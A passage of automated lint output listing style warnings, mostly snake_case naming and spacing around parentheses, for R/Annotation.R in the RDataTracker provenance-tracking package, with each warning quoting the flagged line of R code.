^~~~~~~~~~~\n```\n[R/Annotation.R:110:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L110) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.stmt <- cmd.func()\n    ^~~~~~~~~~~\n```\n[R/Annotation.R:114:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L114) *style:* **Variable or function name should be snake_case.**\n```r\n​  orig.expr <- substitute(expr)\n  ^~~~~~~~~\n```\n[R/Annotation.R:118:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L118) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.num <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~\n```\n[R/Annotation.R:121:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L121) *style:* **Variable or function name should be snake_case.**\n```r\n​  orig.return <- paste(\"return(\", deparse(orig.expr), \")\", sep=\"\")\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:131:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L131) *style:* **Variable or function name should be snake_case.**\n```r\n​    caller.frame <- .ddg.find.ddg.return.value.caller.frame.number ()\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:131:68:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L131) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    caller.frame <- .ddg.find.ddg.return.value.caller.frame.number ()\n                                                                   ^\n```\n[R/Annotation.R:137:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L137) *style:* **Variable or function name should be snake_case.**\n```r\n​    caller.frame <- -1\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:154:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L154) *style:* **Variable or function name should be snake_case.**\n```r\n​    full.call <- match.call(sys.function(caller.frame), call=call)\n    ^~~~~~~~~\n```\n[R/Annotation.R:161:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L161) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.dec (\".ddg.func.depth\")\n             ^\n```\n[R/Annotation.R:166:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L166) *style:* **Variable or function name should be snake_case.**\n```r\n​    return.stmt <- .ddg.construct.DDGStatement (parse(text=orig.return), \n    ^~~~~~~~~~~\n```\n[R/Annotation.R:166:48:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L166) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return.stmt <- .ddg.construct.DDGStatement (parse(text=orig.return), \n                                               ^\n```\n[R/Annotation.R:171:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L171) *style:* **Variable or function name should be snake_case.**\n```r\n​    return.stmt <- cmd.func()\n    ^~~~~~~~~~~\n```\n[R/Annotation.R:176:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L176) *style:* **Variable or function name should be snake_case.**\n```r\n​  call.text <- gsub(\" \", \"\", deparse(call, nlines=1))\n  ^~~~~~~~~\n```\n[R/Annotation.R:177:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L177) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.node.name <- paste(call.text, \"return\")\n  ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:181:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L181) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.node.scope <-\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:182:23:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L182) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​      environmentName (if (sys.nframe() == 2) .GlobalEnv\n                      ^\n```\n[R/Annotation.R:201:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L201) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.add.to.return.values (call.text)\n                            ^\n```\n[R/Annotation.R:207:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L207) *style:* **Variable or function name should be snake_case.**\n```r\n​    vars.used <- return.stmt@vars.used\n    ^~~~~~~~~\n```\n[R/Annotation.R:224:13:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L224) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( .ddg.is.nonlocal.assign(return.stmt@parsed[[1]]) )\n            ^\n```\n[R/Annotation.R:224:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L224) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( .ddg.is.nonlocal.assign(return.stmt@parsed[[1]]) )\n                                                             ^\n```\n[R/Annotation.R:226:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L226) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          env <- .ddg.where( var, env = parent.env(parent.frame()), warning = FALSE )\n                            ^\n```\n[R/Annotation.R:226:84:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L226) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          env <- .ddg.where( var, env = parent.env(parent.frame()), warning = FALSE )\n                                                                                   ^\n```\n[R/Annotation.R:228:15:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L228) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          if ( identical(env, \"undefined\") )\n              ^\n```\n[R/Annotation.R:228:43:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L228) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          if ( identical(env, \"undefined\") )\n                                          ^\n```\n[R/Annotation.R:243:44:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L243) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.create.file.write.nodes.and.edges ()\n                                           ^\n```\n[R/Annotation.R:244:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L244) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.create.graphics.nodes.and.edges ()\n                                         ^\n```\n[R/Annotation.R:263:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L263) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.ddg.return.value.caller.frame.number <- function() {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:268:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L268) *style:* **Variable or function name should be snake_case.**\n```r\n​  ddg.funcs <- unlist(lapply (calls, \n  ^~~~~~~~~\n```\n[R/Annotation.R:268:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L268) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  ddg.funcs <- unlist(lapply (calls, \n                             ^\n```\n[R/Annotation.R:269:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L269) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) return (grepl(\"^ddg|.ddg\", deparse(call)[[1]]))))\n             ^\n```\n[R/Annotation.R:269:28:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L269) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) return (grepl(\"^ddg|.ddg\", deparse(call)[[1]]))))\n                           ^\n```\n[R/Annotation.R:270:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L270) *style:* **Variable or function name should be snake_case.**\n```r\n​  calls.to.ddg.return.value <- unlist(lapply(calls, \n  ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:271:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L271) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) \n             ^\n```\n[R/Annotation.R:273:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L273) *style:* **Variable or function name should be snake_case.**\n```r\n​  non.ddg.calls.to.ddg.return.value <- !(ddg.funcs[1:length(ddg.funcs)-1]) & \n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:275:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Variable or function name should be snake_case.**\n```r\n​  which.frame <- Position (function (call) return (call), \n  ^~~~~~~~~~~\n```\n[R/Annotation.R:275:27:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                          ^\n```\n[R/Annotation.R:275:37:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                                    ^\n```\n[R/Annotation.R:275:51:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                                                  ^\n```\n[R/Annotation.R:279:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L279) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (which.frame)\n         ^\n```\n[R/Annotation.R:286:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L286) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.inside <- function() {\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:303:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L303) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.details.omitted <- function() {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:304:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L304) *style:* **Variable or function name should be snake_case.**\n```r\n​  pnode.name <- \"Details Omitted\"\n  ^~~~~~~~~~\n```\n[R/Annotation.R:320:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L320) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:320:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L320) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n                                     ^\n```\n[R/Annotation.R:320:39:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L320) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n                                      ^~~~~~~~~\n```\n[R/Annotation.R:323:63:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L323) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  if (!.ddg.loop.annotate() && .ddg.inside.loop() > 0) return (FALSE)\n                                                              ^\n```\n[R/Annotation.R:334:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L334) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (.ddg.annotate.inside()) \n         ^\n```\n[R/Annotation.R:353:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L353) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.eval <- function(statement, cmd.func=NULL) {\n^~~~~~~~\n```\n[R/Annotation.R:353:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L353) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.eval <- function(statement, cmd.func=NULL) {\n                                ^~~~~~~~\n```\n[R/Annotation.R:357:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L357) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- parse(text=statement)\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:365:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L365) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- cmd@parsed\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:371:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L371) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- cmd@parsed\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:374:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L374) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  if (.ddg.debug.lib()) print (paste(\"ddg.eval: statement =\", statement))\n                              ^\n```\n[R/Annotation.R:376:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L376) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.num <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~\n```\n[R/Annotation.R:393:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L393) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.value <- .ddg.parse.commands(parsed.statement, environ=env, \n  ^~~~~~~~~~~~\n```\n[R/Annotation.R:404:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L404) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (return.value)\n         ^\n```\n[R/Annotation.R:414:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L414) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.start <- function(pname=NULL) {\n^~~~~~~~~\n```\n[R/Annotation.R:427:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L427) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.number <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~~~~\n```\n[R/Annotation.R:429:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L429) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.create.start.for.cur.cmd (env)\n                                ^\n```\n[R/Annotation.R:447:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L447) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.finish <- function(pname=NULL) {\n^~~~~~~~~~\n```\n[R/Annotation.R:455:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L455) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.insert.error.message (msg)\n                              ^\n```\n[R/Annotation.R:466:19:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L466) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return(.ddg.get (\".ddg.last.R.value\"))\n                  ^\n```\n[R/Annotation.R:474:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L474) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.annotate.on <- function (fnames=NULL){\n^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:474:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L474) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.annotate.on <- function (fnames=NULL){\n                            ^\n```\n[R/Annotation.R:482:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L482) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- .ddg.get(\"ddg.annotate.on\")\n  ^~~~~~~\n```\n[R/Annotation.R:483:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L483) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- union (on.list, fnames)\n  ^~~~~~~\n```\n[R/Annotation.R:483:20:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L483) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  on.list <- union (on.list, fnames)\n                   ^\n```\n[R/Annotation.R:487:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L487) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- .ddg.annotate.off()\n  ^~~~~~~~\n```\n[R/Annotation.R:488:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L488) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- Filter (function(off) !(off %in% fnames), off.list)\n  ^~~~~~~~\n```\n[R/Annotation.R:488:22:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L488) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  off.list <- Filter (function(off) !(off %in% fnames), off.list)\n                     ^\n```\n[R/Annotation.R:498:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L498) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.annotate.off <- function (fnames=NULL) {\n^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:498:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L498) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.annotate.off <- function (fnames=NULL) {\n                             ^\n```\n[R/Annotation.R:506:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L506) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- .ddg.annotate.off()\n  ^~~~~~~~\n```\n[R/Annotation.R:507:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L507) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- union (off.list, fnames)\n  ^~~~~~~~\n```\n[R/Annotation.R:507:21:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L507) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  off.list <- union (off.list, fnames)\n                    ^\n```\n[R/Annotation.R:511:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L511) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- .ddg.annotate.on()\n  ^~~~~~~\n```\n[R/Annotation.R:512:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L512) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- Filter (function(on) !(on %in% fnames), on.list)\n  ^~~~~~~\n```\n[R/Annotation.R:512:21:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L512) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  on.list <- Filter (function(on) !(on %in% fnames), on.list)\n                    ^\n```\n[R/Annotation.R:523:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L523) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.save.annotated.script <- function(cmds, script.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:523:46:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L523) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.save.annotated.script <- function(cmds, script.name) {\n                                             ^~~~~~~~~~~\n```\n[R/Annotation.R:542:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L542) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.annotations <- function(command) {\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:545:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L545) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command <- command@parsed[[1]]\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:562:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L562) *style:* **Variable or function name should be snake_case.**\n```r\n​  statement.type <- .ddg.get.statement.type(parsed.command)\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:563:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L563) *style:* **Variable or function name should be snake_case.**\n```r\n​  loop.types <- list(\"for\", \"while\", \"repeat\")\n  ^~~~~~~~~~\n```\n[R/Annotation.R:593:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L593) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.ddg.source <- function(parsed.command, cmd) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:593:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L593) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.ddg.source <- function(parsed.command, cmd) {\n                                ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:594:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L594) *style:* **Variable or function name should be snake_case.**\n```r\n​  script.name <- deparse(parsed.command[[2]])\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:595:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L595) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- paste(\"ddg.source(\", script.name, \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:614:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L614) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.function.annotations <- function(function.decl) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:614:43:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L614) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.function.annotations <- function(function.decl) {\n                                          ^~~~~~~~~~~~~\n```\n[R/Annotation.R:616:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L616) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.function.decl <- function.decl@parsed[[1]]\n  ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:619:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L619) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.name <- toString(parsed.function.decl[[2]])\n  ^~~~~~~~~\n```\n[R/Annotation.R:623:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L623) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.definition <- parsed.function.decl[[3]]\n  ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:627:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L627) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.create.function.block(func.definition)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:631:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L631) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.definition <- .ddg.add.conditional.statement(func.definition, func.name)\n  ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:635:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L635) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.insert.ddg.function(func.definition)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:640:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L640) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.all.return.parameters(func.definition, \n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:646:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L646) *style:* **Variable or function name should be snake_case.**\n```r\n​  last.statement <- .ddg.find.last.statement(func.definition)\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:651:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L651) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- 